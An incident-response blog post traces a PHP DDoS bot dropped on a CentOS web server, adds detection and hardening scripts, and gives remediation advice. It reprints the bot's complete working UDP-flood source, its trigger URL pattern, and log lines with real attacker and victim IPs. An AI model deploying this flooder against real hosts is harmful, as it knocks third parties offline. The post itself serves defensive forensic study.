Chasing down a trojan on a compromised CentOS server
<p>At five this morning I got an alert SMS from Jiankongbao (监控宝) saying that website M was unreachable. I was sound asleep; the site runs on CentOS and the important data is backed up every day, so it ought to be safe. I paid no attention and went back to sleep.</p>
<p>
At nine, the data-centre manager called me directly: the whole server room's network was crawling, and every one of our sites was either unreachable or extremely slow.</p>
<p>
I rushed over and looked at the network there. Server 175 was pushing traffic out at a steady 50M/s, and 175 is exactly the server that hosts site M.</p>
<p>
I SSHed into 175 straight away; even the SSH connection was slow. Once in, I ran top to look at the CPU load:</p>
<p><code>top</code></p>
<p>
Two apache processes were sitting above 40% CPU the whole time. I stopped the httpd service immediately:</p>
<div class="jb51code">
<pre><code>service httpd stop</code></pre>
</div>
<p>
With httpd stopped I checked the network again: 175 was no longer sending anything, and everything was back to normal.</p>
<p>
So the conclusion was that 175 had been planted with malware that was flooding traffic outbound and eating the whole room's bandwidth.</p>
<p>
<span><strong>Next step: catch the malware!</strong></span></p>
<p>
175 sits behind a hardware firewall with only HTTP (80) and SSH (22) open. A stolen SSH account is unlikely, so the malware most probably came in through a web vulnerability. The compromise happened at about 5 a.m., so the malicious file should have been created within the last day.</p>
<p>
I changed into site M's document root and searched for files changed within the last day:</p>
<div class="jb51code">
<pre><code>find ./ -mtime -1</code></pre>
</div>
<p>
Sure enough, a suspicious file named phzLtoxn.php showed up in the listing. To see who had created it, I ran:</p>
<div class="jb51code">
<pre><code>ls -l phzLtoxn.php</code></pre>
</div>
<p>
And the file was gone. Does this thing self-destruct?</p>
<p>
It turned out there had been a small side show: Xiao Huang, the admin next door, had also noticed the file and deleted it without a second thought. I went over and gave him a proper talking-to. See a trojan and just delete, delete, delete! Won't it simply be regenerated? You have to follow the trail, not chop it off; you have to find the vulnerability it came through. With the file already gone there was nothing else to do, so I started httpd again, deliberately leaving the door open to see whether the file would come back.</p>
<p>
Sure enough, in under half an hour a new phzLtoxn.php appeared. Its owner was apache, which confirmed that it was being dropped through a vulnerability in the website itself.</p>
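<p>The search above (find by mtime, then ls -l for the owner) is the right idea, but done by hand it misses two things: a dropper can back-date a file's mtime with touch, and a listing alone does not say which of the new files is hostile. The following script is an added example and not code from the original post; it looks for PHP files under a web root whose mtime <em>or</em> ctime is recent (ctime cannot be forged with touch) and flags those containing the calls used by phzLtoxn.php and by common web shells. It needs GNU find; the sample web root it builds is constructed for the demo and the flooder inside it is only a stand-in holding the signature lines.</p>

```shell
#!/bin/sh
# Added example, not code from the original post: hunt for the kind of file
# phzLtoxn.php was, i.e. a PHP file that appeared recently under the web root
# and carries the calls typical of a flooder or backdoor. Needs GNU find.
# make_sample_webroot builds a constructed web root for the demonstration.

# Calls seen in the flooder on this page plus the usual web-shell primitives.
SUSPICIOUS='fsockopen|ignore_user_abort|set_time_limit|eval\(|base64_decode|assert\(|system\(|passthru\(|shell_exec'

# find_recent_php WEBROOT DAYS
# PHP files whose mtime OR ctime is younger than DAYS days. An attacker can
# back-date mtime with touch but cannot set ctime, so both are printed:
# "mtime ctime owner path".
find_recent_php() {
    webroot=$1; days=${2:-1}
    find "$webroot" -type f -name '*.php' \( -mtime "-$days" -o -ctime "-$days" \) \
        -printf '%TY-%Tm-%Td %CY-%Cm-%Cd %u %p\n' 2>/dev/null | sort -k4
}

# scan_suspicious WEBROOT DAYS
# For each recent PHP file print "path: matched calls" when any suspicious call is present.
scan_suspicious() {
    webroot=$1; days=${2:-1}
    find "$webroot" -type f -name '*.php' \( -mtime "-$days" -o -ctime "-$days" \) 2>/dev/null | sort |
    while IFS= read -r f; do
        hits=$(grep -oE "$SUSPICIOUS" "$f" 2>/dev/null | sort -u | tr '\n' ' ' | sed 's/ $//')
        if [ -n "$hits" ]; then
            printf '%s: %s\n' "$f" "$hits"
        fi
    done
    return 0
}

# make_sample_webroot : constructed web root with one old file, one new harmless
# file and one stand-in for the dropped flooder. Prints the root path.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/cache" "$root/uploads"
    printf '%s\n' '<?php echo "site M"; ?>' > "$root/index.php"
    touch -t 202301010000 "$root/index.php"        # back-dated mtime; ctime still says "today"
    printf '%s\n' '<?php phpinfo(); ?>' > "$root/uploads/info.php"   # new but harmless
    # Constructed stand-in for the flooder: only its signature lines, not a working tool.
    printf '%s\n' '<?php set_time_limit(999999); ignore_user_abort(TRUE);' \
        '$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); ?>' > "$root/cache/phzLtoxn.php"
    printf '%s\n' "$root"
}
```

<p>On a real box run it as <code>scan_suspicious /var/www/M 1</code> and, once the server has stopped writing, extend DAYS backwards: a dropper that has been on the machine for weeks will not show up with a one-day window. The owner column from find_recent_php is the same evidence the ls -l step gave (a file owned by apache was written by the web server, not by an administrator).</p>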
<p>
Analysing the malicious file to see what the attacker was after</p>
<p>
Here is the source of phzLtoxn.php with brief annotations, for study only.</p>
<div class="jb51code">
<pre><code><?php
// Let the script run (practically) without a time limit
set_time_limit(999999);
// Target server IP
$host = $_GET['host'];
// Target server port
$port = $_GET['port'];
// Attack duration in seconds
$exec_time = $_GET['time'];
// Bytes sent per packet
$Sendlen = 65535;
$packets = 0;
// Keep running even after the client (the attacker's browser) disconnects
ignore_user_abort(TRUE);
// Step 1. Check that target $host, port $port and duration $exec_time were supplied.
// If not, and a 'rat' parameter is present, echo host name, resolved IP, OS and
// server software wrapped in the 'rat' marker: a check-in the controller uses
// to verify that this zombie is alive.
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {
    if (StrLen($_GET['rat']) <> 0) {
        echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . GetHostByName($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_software'] . $_GET['rat'];
        exit;
    }
    echo "Warning to: opening";
    exit;
}
// Step 2. Build the payload string $out: "AAAAAAAAAA..." of $Sendlen bytes
for ($i = 0; $i < $Sendlen; $i++) {
    $out .= "A";
}
$max_time = time() + $exec_time;
// Step 3. Attack: hammer the target with UDP datagrams until time is up
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
// Step 4. Attack statistics
echo "Send Host $host:$port<br><br>";
echo "Send Flow $packets * ($Sendlen/1024=" . round($Sendlen / 1024, 2) . ")kb / 1024 = " . round($packets * $Sendlen / 1024 / 1024, 2) . " mb<br><br>";
echo "Send Rate " . round($packets / $exec_time, 2) . " packs/s" . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . " mb/s";
?></code></pre>
</div>
<p>
The code is a typical DDoS tool: a UDP flood that fires 65535-byte datagrams at the target for as long as the time parameter says. The attacker was using our server as a zombie, presumably one of many, to flood whoever they chose. All they need is a browser: requesting http://M站域名.com//phzLtoxn.php?host=x.x.x.x&port=xx&time=xx launches the attack. Note the rat branch as well: called with only a rat parameter, the script echoes the host name, its resolved IP, php_uname() and the server software between the rat markers, which lets the controller enumerate its zombies and confirm which ones are still alive.</p>
<p>
Next I checked the httpd log to see where the requests were coming from:</p>
<div class="jb51code">
<pre><code>tail /var/log/httpd/access.log | grep phzLtoxn.php
183.12.75.240 - - "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code></pre>
</div>
<p>
There are several source IPs and several target IPs, spread across a number of countries. The 404 status on every line shows these requests arrived while the file was absent (after it had been deleted), and the controllers kept calling it regardless. Odd, though: why would an attacker pick these particular targets? A bored attacker, it seems.<br>
Next step: find the vulnerability!</p>
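<p>Reading the ten lines above by eye works for ten lines; for a day's worth of log it does not. The script below is an added example and not code from the original post. It answers three questions from access-log lines: which IPs are driving the flooder, which host:port pairs they aim it at, and whether each call hit a live copy of the script (200) or a deleted one (404). SAMPLE_LOG is constructed from the entries quoted above (same source and target IPs, user agents shortened, no timestamps because the quoted lines carry none) plus two extra lines marked in the code; the status code is located relative to the HTTP/1.x token, so the same awk works on standard combined-format lines that do carry a timestamp.</p>

```shell
#!/bin/sh
# Added example, not code from the original post: summarise who drives the
# flooder, whom it is aimed at, and whether the calls actually ran, from
# httpd access-log lines. SAMPLE_LOG is constructed from the entries quoted
# on this page; the last two lines are extra (see the comment below them).

SAMPLE_LOG='183.12.75.240 - - "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
110.185.121.167 - - "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
110.185.121.167 - - "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
110.185.121.167 - - "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
110.185.121.167 - - "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
118.161.219.152 - - "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
118.161.219.152 - - "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
118.161.219.152 - - "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
118.161.219.152 - - "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
118.161.219.152 - - "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0"
118.161.219.152 - - "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 200 312 "-" "Mozilla/4.0"
1.2.3.4 - - "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
# The two lines above are constructed: one call that reached a live copy of
# the script (200), and one ordinary page hit that the filter must ignore.

# flood_requests LOGFILE SCRIPT : only the lines that invoke the flooder.
flood_requests() {
    grep -F "GET /$2?" "$1" || true
}

# top_sources LOGFILE SCRIPT : requests per controlling IP, busiest first.
top_sources() {
    flood_requests "$1" "$2" |
    awk '{ n[$1]++ } END { for (ip in n) printf "%d %s\n", n[ip], ip }' |
    sort -k1,1nr -k2,2
}

# top_targets LOGFILE SCRIPT : victim host:port per request, most hit first.
top_targets() {
    flood_requests "$1" "$2" |
    awk 'match($0, /host=[0-9.]+&port=[0-9]+/) {
             t = substr($0, RSTART + 5, RLENGTH - 5)   # drop the leading "host="
             sub(/&port=/, ":", t)
             n[t]++
         }
         END { for (t in n) printf "%d %s\n", n[t], t }' |
    sort -k1,1nr -k2,2
}

# status_summary LOGFILE SCRIPT : calls that hit a live script (200) versus a
# deleted one (404). The status is the field right after the HTTP/1.x token,
# whatever comes before it (timestamp or not).
status_summary() {
    flood_requests "$1" "$2" |
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^HTTP\/[0-9.]+"$/) { n[$(i+1)]++; break } }
         END { for (s in n) printf "%d %s\n", n[s], s }' |
    sort -k1,1nr -k2,2
}
```

<p>Against the real log the calls are <code>top_sources /var/log/httpd/access.log phzLtoxn.php</code> and so on. The source list is what you hand to the firewall; the target list is what you would pass on to the victims' operators; the 200 count tells you how many attack runs the server actually carried out before the file was removed.</p>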
<p>
1. I went back over the file permissions under site M's directory. Apache now has write permission only on the few cache and static-page directories that need it, so that phzLtoxn.php cannot be written again.</p>
<p>
2. I started httpd again and ran the 360 site scanner (http://webscan.360.cn/) against site H. It reported a serious remote code execution vulnerability in H, which I patched right away.</p>
<p>
3. With the patch in place I also changed the passwords of the system user, the database user and the FTP user, and site M's own user passwords.</p>
<p>
After a few days of watching, everything is normal.</p>
<p>
<span><strong>A few security principles, in summary</strong></span></p>
<p>
1. Least privilege.</p>
<p>
Set the permissions on the web directory properly: give apache write access only to the few folders that genuinely need it.</p>
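<p>Remediation step 1 and this principle are the same rule; the script below is an added example, not code from the original post, that applies it and then audits the result. harden_webroot makes everything under the root read-only for the server and opens only the named directories for writing; audit_webroot lists every directory that still accepts writes from group or others and any script file sitting inside one, which is exactly the combination a dropper needs. The directory names (cache, static) and the group name apache are assumptions; the chown step needs root and an apache group and is skipped otherwise, so the rest can be tried anywhere. make_sample_site builds a constructed web root containing the mistakes the audit should catch.</p>

```shell
#!/bin/sh
# Added example, not code from the original post: apply and audit the rule
# "the web server may write only where it must". Directory names and the
# group "apache" are assumptions; chown runs only as root with that group
# present. make_sample_site is a constructed web root for the demonstration.

# harden_webroot ROOT WRITABLE_DIR... : files and directories read-only for the
# server, except the listed directories, which become group-writable for it.
harden_webroot() {
    root=$1; shift
    if [ "$(id -u)" -eq 0 ] && getent group apache >/dev/null 2>&1; then
        chown -R root:apache "$root"           # owned by root, readable by the server via its group
    fi
    find "$root" -type d -exec chmod 755 {} +  # directories: no group/other write
    find "$root" -type f -exec chmod 644 {} +  # files: no write, no execute bit
    for d in "$@"; do
        mkdir -p "$root/$d"
        chmod 775 "$root/$d"                   # only here may the server create files
    done
}

# audit_webroot ROOT : every directory writable by group or others, and any
# script inside one. A script in a writable directory is what a dropper like
# phzLtoxn.php needs, so the second kind of line should never appear.
audit_webroot() {
    find "$1" -type d \( -perm -020 -o -perm -002 \) | sort |
    while IFS= read -r d; do
        printf 'writable dir: %s\n' "$d"
        find "$d" -maxdepth 1 -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.cgi' \) | sort |
        while IFS= read -r f; do
            printf '  script in writable dir: %s\n' "$f"
        done
    done
    return 0
}

# make_sample_site : constructed web root with a dropped script in the cache
# directory and a world-writable admin directory. Prints the root path.
make_sample_site() {
    root=$(mktemp -d)
    mkdir -p "$root/cache" "$root/static" "$root/admin"
    printf '%s\n' '<?php echo "site M"; ?>' > "$root/index.php"
    printf '%s\n' '<?php /* constructed stand-in for the dropped flooder */ ?>' > "$root/cache/phzLtoxn.php"
    chmod 777 "$root/admin"                    # the classic mistake: world-writable directory
    printf '%s\n' "$root"
}
```

<p>Permissions alone still leave the cache and static directories both writable and executable by the PHP engine, which is why the audit prints the script it finds there. The complement on the Apache side, assuming mod_php, is to switch the engine off for those directories (<code>php_admin_flag engine off</code> inside a <code>&lt;Directory&gt;</code> block for each writable path) so that a file the server does manage to write there is served as text rather than run.</p>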
<p>
2. Keep up with patches.</p>
<p>
Run a third-party site scanner regularly, such as http://webscan.360.cn, or one of the ten common security assessment tools; if the site is built on a widely used third-party application, keep an eye on the WooYun vulnerability platform at http://www.wooyun.org/.</p>
<p>
3. After a compromise, close the hole properly.</p>
<p>
Don't just delete, delete, delete. Find the entry point and work out what the attacker was after.</p>
<p>
I'd still like the experts to weigh in: why would this crew use so many zombies to DDoS different servers that have nothing to do with each other? Why is there no obvious targeting? Just burning bandwidth for fun?!</p>
<p>
Original post: http://blog.csdn.net/qq_21439971/article/details/54631440</p>